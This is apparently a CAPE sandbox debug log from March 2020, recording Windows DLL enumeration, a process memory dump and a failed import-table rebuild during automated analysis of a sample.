2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,260 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,260 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,260 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:35,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:35,510 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:35,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:35,510 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:35,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:35,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:35,526 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:35,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:35,542 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:35,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:35,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,588 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:35,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:35,605 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:35,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:35,605 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:35,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:35,619 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:35,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:35,635 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:35,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:35,635 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:35,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:35,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:35,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:35,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:35,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:35,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:35,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:35,683 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:35,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:35,683 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:35,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:35,697 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:35,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:35,713 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:35,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:35,713 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00400000
2020-03-24 10:16:35,729 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00413A84
2020-03-24 10:16:35,729 [root] DEBUG: Module image dump success
2020-03-24 10:16:35,729 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x414000, size: 0x588
2020-03-24 10:16:35,744 [root] DEBUG: IAT parsing finished, found 342 valid APIs, missed 0 APIs
2020-03-24 10:16:35,744 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:16:35,760 [root] DEBUG: Adding module to module list: gdi32.dll
2020-03-24 10:16:35,760 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:16:35,760 [root] DEBUG: Adding module to module list: msvcp60.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: shell32.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:16:35,792 [root] DEBUG: Adding module to module list: wininet.dll
2020-03-24 10:16:35,792 [root] DEBUG: Adding module to module list: winmm.dll
2020-03-24 10:16:35,792 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:16:35,806 [root] DEBUG: Adding module to module list: GdiPlus.dll
2020-03-24 10:16:35,806 [root] DEBUG: Adding module to module list: urlmon.dll
2020-03-24 10:16:35,806 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:16:35,806 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:16:35,822 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:16:35,838 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1540_56812516235161024232020
2020-03-24 10:16:35,838 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00430000.
2020-03-24 10:16:35,854 [root] DEBUG: ApiReader: module list size: 112
2020-03-24 10:16:35,854 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:35,869 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:35,869 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:35,869 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:35,884 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:35,884 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:35,884 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:35,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:35,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:35,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:35,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:35,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:35,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:35,994 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:35,994 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:35,994 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:36,040 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:36,040 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:36,056 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:36,056 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:36,056 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
